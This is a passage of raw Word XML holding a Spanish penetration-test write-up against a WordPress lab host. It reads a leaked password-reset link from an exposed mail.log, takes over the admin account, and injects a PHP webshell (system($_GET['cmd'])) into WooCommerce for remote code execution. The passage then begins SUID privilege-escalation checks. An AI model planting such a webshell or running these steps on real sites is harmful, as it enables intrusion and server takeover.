          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>5. Enumeración de usuarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Con WPScan se identificó un único usuario del sistema:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8"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
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1333500"/>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8. Usuario “admin” identificado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Este dato confirma que el vector de ataque debe orientarse hacia la única cuenta administrativa existente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="6" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>6. Descubrimiento adicional de rutas (ffuf)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3248025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9"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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3248025"/>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9. Resultados de ffuf.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se identificaron múltiples rutas con listado de directorios habilitado:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/wp-content/uploads/ → Directory Listing ON.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/wp-content/plugins/ → Directory Listing ON. Plugins instalados visibles (WooCommerce).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/wp-content/themes/ → Directory Listing ON. Temas instalados visibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/wp-admin/css/ → Directory Listing ON.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/wp-admin/includes/ → Directory Listing ON.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/wp-admin/js/ → Directory Listing ON.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/wp-includes/ → Directory Listing ON (múltiples archivos).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10"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
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1905000"/>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10. Evidencia del listado de directorios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="6" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>7. Explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.1 Fuga de credenciales mediante restablecimiento de contraseña</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Al realizar una petición POST a wp-login.php?action=lostpassword, el servidor procesó la solicitud de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Recibió la solicitud de reset para el usuario admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Generó un correo con el enlace de restablecimiento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Al no contar con un MTA real (Postfix/Sendmail) configurado, escribió el correo en un archivo de log (mail.log).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dicho archivo quedó expuesto públicamente en /wp-content/uploads/mail.log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t>Resultado: [200] http://172.17.0.2/wp-content/uploads/mail.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Al consultar el archivo se obtuvo el correo completo con el enlace de restablecimiento de contraseña:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="EDEDED"/>
        <w:spacing w:before="100" w:after="160"/>
        <w:ind w:left="200" w:right="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl -s http://172.17.0.2/wp-content/uploads/mail.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3771900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11"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descr=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3771900"/>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11. Contenido de mail.log, incluyendo el enlace de restablecimiento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El enlace obtenido fue el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="EDEDED"/>
        <w:spacing w:before="100" w:after="160"/>
        <w:ind w:left="200" w:right="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://172.17.0.2/wp-login.php?login=admin&amp;key=OnYIYuyPtZB42KiuMLQG&amp;action=rp&amp;wp_lang=en_US</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2476500" cy="3962400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12"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descr=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2476500" cy="3962400"/>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12. Formulario de restablecimiento de contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Utilizando dicho enlace se obtuvo acceso al panel de administración de WordPress:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="2657475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13"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descr=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2657475"/>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13. Acceso obtenido al panel de WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.2 Inyección de webshell y ejecución remota de código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Con acceso administrativo se accedió al editor de plugins para modificar el código de WooCommerce:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="EDEDED"/>
        <w:spacing w:before="100" w:after="160"/>
        <w:ind w:left="200" w:right="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://172.17.0.2/wp-admin/plugin-editor.php?file=woocommerce%2Fwoocommerce.php&amp;plugin=woocommerce%2Fwoocommerce.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se inyectó el siguiente código como webshell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="EDEDED"/>
        <w:spacing w:before="100" w:after="160"/>
        <w:ind w:left="200" w:right="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?php if(isset($_GET['cmd'])){   system($_GET['cmd']); } ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3048000" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14"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descr=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3048000" cy="3124200"/>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14. Webshell inyectada en el editor de plugins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A partir de este punto se obtuvo ejecución remota de código (RCE) sobre el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4000500" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15"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descr=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4000500" cy="457200"/>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15. Confirmación de RCE mediante la webshell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="6" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>8. Post-explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Con RCE confirmado, se realizó una búsqueda de binarios con el bit SUID activo, técnica habitual para identificar rutas de escalada de privilegios:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16"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descr=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1790700"/>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16. Búsqueda de archivos SUID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El resultado inicial correspondió a un falso positivo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="447675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17"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descr=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="447675"/>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17. Resultado descartado (falso positivo).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
